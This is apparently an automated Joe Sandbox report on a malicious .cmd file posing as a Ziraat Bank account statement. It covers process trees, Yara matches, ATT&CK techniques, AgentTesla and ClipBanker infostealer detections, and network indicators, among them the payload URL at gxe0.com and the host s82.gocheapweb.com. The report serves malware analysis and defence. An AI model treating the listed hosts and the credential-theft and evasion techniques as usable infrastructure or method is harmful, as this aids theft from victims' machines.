                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 12.0.neworigin.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 6488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 7592, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 12.0.neworigin.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2382397061.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2287190785.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 6488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 7592, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts
                      121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      21
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      System Time Discovery
                      1
                      Taint Shared Content
                      11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API
                      1
                      Valid Accounts
                      1
                      Valid Accounts
                      11
                      Deobfuscate/Decode Files or Information
                      21
                      Input Capture
                      1
                      System Network Connections Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Shared Modules
                      1
                      Scheduled Task/Job
                      1
                      Access Token Manipulation
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      3
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Command and Scripting Interpreter
                      21
                      Registry Run Keys / Startup Folder
                      311
                      Process Injection
                      1
                      Timestomp
                      NTDS47
                      System Information Discovery
                      Distributed Component Object Model21
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts1
                      Scheduled Task/Job
                      Network Logon Script1
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      LSA Secrets1
                      Query Registry
                      SSH1
                      Clipboard Data
                      123
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                      Registry Run Keys / Startup Folder
                      311
                      Masquerading
                      Cached Domain Credentials331
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Valid Accounts
                      DCSync1
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation
                      Proc Filesystem151
                      Virtualization/Sandbox Evasion
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                      Virtualization/Sandbox Evasion
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                      Process Injection
                      Network Sniffing1
                      System Network Configuration Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554476 Sample: TC_Ziraat_Bankasi_Hesap_Eks... Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 105 s82.gocheapweb.com 2->105 107 pywolwnvd.biz 2->107 109 2 other IPs or domains 2->109 157 Found malware configuration 2->157 159 Malicious sample detected (through community Yara rule) 2->159 161 Antivirus detection for dropped file 2->161 163 11 other signatures 2->163 11 cmd.exe 1 2->11         started        13 Wisrysxl.PIF 2->13         started        16 Wisrysxl.PIF 2->16         started        18 2 other processes 2->18 signatures3 process4 signatures5 20 x.exe 1 7 11->20         started        25 extrac32.exe 8 11->25         started        27 conhost.exe 11->27         started        173 Writes to foreign memory regions 13->173 175 Allocates memory in foreign processes 13->175 177 Sample uses process hollowing technique 13->177 29 lxsyrsiW.pif 13->29         started        31 lxsyrsiW.pif 16->31         started        process6 dnsIp7 111 gxe0.com 198.252.105.91, 443, 49704, 49705 HAWKHOSTCA Canada 20->111 97 C:\Users\Public\Libraries\lxsyrsiW.pif, PE32 20->97 dropped 99 C:\Users\Public\Wisrysxl.url, MS 20->99 dropped 101 C:\Users\Public\Libraries\Wisrysxl, data 20->101 dropped 165 Drops PE files with a suspicious file extension 20->165 167 Writes to foreign memory regions 20->167 169 Allocates memory in foreign processes 20->169 171 2 other signatures 20->171 33 lxsyrsiW.pif 4 20->33         started        37 cmd.exe 1 20->37         started        39 esentutl.exe 2 20->39         started        103 C:\Users\user\AppData\Local\Temp\x.exe, PE32 25->103 dropped 41 neworigin.exe 29->41         started        43 server_BTC.exe 29->43         started        45 neworigin.exe 31->45         started        47 server_BTC.exe 31->47         started        file8 signatures9 process10 file11 83 C:\Users\user\AppData\...\server_BTC.exe, PE32 33->83 dropped 85 C:\Users\user\AppData\Local\...\neworigin.exe, PE32 33->85 dropped 87 C:\Program Files (x86)\...\armsvc.exe, PE32 33->87 dropped 125 Drops executable to a common third party application directory 33->125 127 Infects executable files (exe, dll, sys, html) 33->127 49 server_BTC.exe 33->49         started        53 neworigin.exe 15 2 33->53         started        56 esentutl.exe 2 37->56         started        58 esentutl.exe 2 37->58         started        60 conhost.exe 37->60         started        89 C:\Users\Public\Libraries\Wisrysxl.PIF, PE32 39->89 dropped 62 conhost.exe 39->62         started        129 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 41->129 131 Tries to steal Mail credentials (via file / registry access) 41->131 133 Tries to harvest and steal ftp login credentials 41->133 135 2 other signatures 41->135 signatures12 process13 dnsIp14 91 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 49->91 dropped 137 Antivirus detection for dropped file 49->137 139 Multi AV Scanner detection for dropped file 49->139 141 Machine Learning detection for dropped file 49->141 155 2 other signatures 49->155 64 TrojanAIbot.exe 49->64         started        67 powershell.exe 49->67         started        69 cmd.exe 49->69         started        71 schtasks.exe 49->71         started        113 s82.gocheapweb.com 51.195.88.199, 49707, 49710, 49737 OVHFR France 53->113 115 api.ipify.org 104.26.13.205, 443, 49706, 49721 CLOUDFLARENETUS United States 53->115 143 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 53->143 145 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 53->145 147 Tries to steal Mail credentials (via file / registry access) 53->147 93 C:\Users\Public\alpha.pif, PE32 56->93 dropped 149 Drops PE files to the user root directory 56->149 151 Drops PE files with a suspicious file extension 56->151 153 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 56->153 95 C:\Users\Public\xpha.pif, PE32 58->95 dropped file15 signatures16 process17 signatures18 117 Antivirus detection for dropped file 64->117 119 Multi AV Scanner detection for dropped file 64->119 121 Machine Learning detection for dropped file 64->121 123 Loading BitLocker PowerShell Module 67->123 73 conhost.exe 67->73         started        75 WmiPrvSE.exe 67->75         started        77 conhost.exe 69->77         started        79 timeout.exe 69->79         started        81 conhost.exe 71->81         started        process19

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%AviraTR/Spy.Gen8
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%AviraHEUR/AGEN.1311721
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%AviraHEUR/AGEN.1311721
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%Joe Sandbox ML
                      C:\Users\Public\Libraries\lxsyrsiW.pif3%ReversingLabs
                      C:\Users\Public\alpha.pif0%ReversingLabs
                      C:\Users\Public\xpha.pif0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\neworigin.exe88%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe66%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe66%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://r11.o.lencr.0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysxlfssexe0%Avira URL Cloudsafe
                      http://r11.i.lencr.80%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysxlfss&0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysxlfss0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysx0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_WisrysxlfssyjHq0%Avira URL Cloudsafe
                      http://s82.gocheapweb.com0%Avira URL Cloudsafe
                      https://gxe0.com/O0%Avira URL Cloudsafe
                      http://r11.o.le70%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      gxe0.com
                      198.252.105.91
                      truefalse
                        high
                        api.ipify.org
                        104.26.13.205
                        truefalse
                          high
                          s82.gocheapweb.com
                          51.195.88.199
                          truefalse
                            high
                            pywolwnvd.biz
                            54.244.188.177
                            truefalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://api.ipify.org/false
                                high
                                https://gxe0.com/yak/233_Wisrysxlfsstrue
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://gxe0.com/yak/233_Wisrysxlfssexex.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gxe0.com/yak/233_Wisrysxx.exe, 00000004.00000002.2182528595.0000000020B7D000.00000004.00001000.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://account.dyn.com/neworigin.exe, 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmpfalse
                                    high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://r11.o.lencr.org0#neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://go.micropowershell.exe, 0000000E.00000002.2212077156.00000000050ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2212077156.0000000004EE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/Licensepowershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Iconpowershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://r11.o.lencr.neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://api.ipify.org/tneworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://r11.i.lencr.org/0neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://gxe0.com/yak/233_WisrysxlfssyjHqx.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://api.ipify.orgneworigin.exe, 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://r11.i.lencr.8neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://aka.ms/pscore6lBpowershell.exe, 0000000E.00000002.2212077156.0000000004791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://gxe0.com/yak/233_Wisrysxlfss&x.exe, 00000004.00000002.2126176510.00000000008BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://x1.c.lencr.org/0neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2383520732.00000000060D5000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539643971.0000000006430000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/0neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2383520732.00000000060D5000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539643971.0000000006430000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://contoso.com/powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://s82.gocheapweb.comneworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameneworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2212077156.0000000004791000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://gxe0.com/Ox.exe, 00000004.00000002.2126176510.0000000000932000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.pmail.comx.exe, x.exe, 00000004.00000002.2209045342.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2191475072.0000000021E50000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2129637377.0000000000986000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054794048.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2192001973.0000000021FFF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2136598756.0000000002BF7000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000B.00000000.2121761760.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 00000019.00000002.2273295756.0000000002D22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001A.00000000.2241974953.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001D.00000002.2353180844.0000000002CB2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001E.00000000.2324372148.0000000000416000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                          high
                                                                          http://r11.o.le7neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          198.252.105.91
                                                                          gxe0.comCanada
                                                                          20068HAWKHOSTCAfalse
                                                                          104.26.13.205
                                                                          api.ipify.orgUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          51.195.88.199
                                                                          s82.gocheapweb.comFrance
                                                                          16276OVHFRfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1554476
                                                                          Start date and time:2024-11-12 15:27:14 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 13m 5s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:35
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd
                                                                          Detection:MAL
                                                                          Classification:mal100.spre.troj.spyw.evad.winCMD@54/27@5/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 66.7%
                                                                          HCA Information:
                                                                          • Successful, ratio: 98%
                                                                          • Number of executed functions: 254
                                                                          • Number of non-executed functions: 50
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .cmd
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target TrojanAIbot.exe, PID 7184 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 5148 because it is empty
                                                                          • Execution Graph export aborted for target server_BTC.exe, PID 6788 because it is empty
                                                                          • Execution Graph export aborted for target server_BTC.exe, PID 7612 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd
                                                                          TimeTypeDescription
                                                                          09:28:08API Interceptor2x Sleep call for process: x.exe modified
                                                                          09:28:20API Interceptor5754721x Sleep call for process: neworigin.exe modified
                                                                          09:28:21API Interceptor2655494x Sleep call for process: TrojanAIbot.exe modified
                                                                          09:28:21API Interceptor15x Sleep call for process: powershell.exe modified
                                                                          09:28:26API Interceptor2x Sleep call for process: Wisrysxl.PIF modified
